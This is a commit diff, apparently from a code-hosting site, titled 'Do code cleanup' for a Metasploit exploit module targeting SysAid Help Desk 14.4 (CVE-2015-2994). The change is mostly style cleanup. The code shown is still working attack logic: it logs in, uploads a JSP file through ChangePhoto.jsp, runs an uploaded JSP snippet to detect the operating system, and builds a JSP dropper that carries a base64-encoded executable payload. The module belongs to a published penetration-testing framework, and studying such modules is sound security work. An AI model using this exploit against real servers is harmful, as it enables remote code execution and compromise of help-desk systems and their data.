Do code cleanup
jvazquez-r7
parent
3181d76e63
commit
309a86ec57
|
|
@ -25,31 +25,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-2994' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
|
||||
['CVE', '2015-2994'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 5 },
|
||||
'Privileged' => false,
|
||||
'Platform' => %w{ linux win },
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'SysAid Help Desk v14.4 / Linux',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86
|
||||
'Platform' => 'linux'
|
||||
}
|
||||
],
|
||||
[ 'SysAid Help Desk v14.4 / Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86
|
||||
'Platform' => 'win'
|
||||
}
|
||||
]
|
||||
],
|
||||
|
|
@ -94,6 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'password' => datastore['PASSWORD']
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 302 && res.get_cookies
|
||||
return res.get_cookies
|
||||
else
|
||||
|
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def upload_payload(payload, is_exploit)
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(payload,
|
||||
"application/octet-stream", 'binary',
|
||||
'application/octet-stream', 'binary',
|
||||
"form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(8))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(10))}.jsp\"")
|
||||
|
||||
data = post_data.to_s
|
||||
|
|
@ -113,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if is_exploit
|
||||
print_status("#{peer} - Uploading payload...")
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], 'ChangePhoto.jsp'),
|
||||
'method' => 'POST',
|
||||
|
|
@ -126,15 +127,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if is_exploit
|
||||
print_status("#{peer} - Payload uploaded successfully")
|
||||
end
|
||||
|
||||
return $1
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def pick_target
|
||||
return target if target.name != 'Automatic'
|
||||
unless target.name == 'Automatic'
|
||||
return target
|
||||
end
|
||||
|
||||
print_status("#{peer} - Determining target")
|
||||
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
|
||||
|
|
@ -157,13 +160,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
def generate_jsp_payload
|
||||
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
|
||||
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
|
||||
exe = generate_payload_exe(opts)
|
||||
base64_exe = Rex::Text.encode_base64(exe)
|
||||
|
||||
|
|
@ -221,36 +222,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
jsp = jsp.gsub(/\n/, '')
|
||||
jsp = jsp.gsub(/\t/, '')
|
||||
jsp = jsp.gsub(/\x0d\x0a/, "")
|
||||
jsp = jsp.gsub(/\x0a/, "")
|
||||
jsp = jsp.gsub(/\x0d\x0a/, '')
|
||||
jsp = jsp.gsub(/\x0a/, '')
|
||||
|
||||
return jsp
|
||||
end
|
||||
|
||||
|
||||
def exploit_native
|
||||
|
||||
|
||||
return jsp_name
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
@cookie = authenticate
|
||||
if not @cookie
|
||||
print_error("#{peer} - Unable to authenticate with the provided credentials.")
|
||||
return
|
||||
else
|
||||
print_status("#{peer} - Authentication was successful with the provided credentials.")
|
||||
unless @cookie
|
||||
fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.")
|
||||
end
|
||||
print_status("#{peer} - Authentication was successful with the provided credentials.")
|
||||
|
||||
@my_target = pick_target
|
||||
if @my_target.nil?
|
||||
print_error("#{peer} - Unable to select a target, we must bail.")
|
||||
return
|
||||
else
|
||||
print_status("#{peer} - Selected target #{@my_target.name}")
|
||||
fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.")
|
||||
end
|
||||
print_status("#{peer} - Selected target #{@my_target.name}")
|
||||
|
||||
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
|
||||
# Fail if this is the case and ask the user to select an appropriate payload.
|
||||
|
|
@ -260,7 +249,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
jsp_payload = generate_jsp_payload
|
||||
jsp_path = upload_payload(jsp_payload, true)
|
||||
if not jsp_path
|
||||
unless jsp_path
|
||||
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue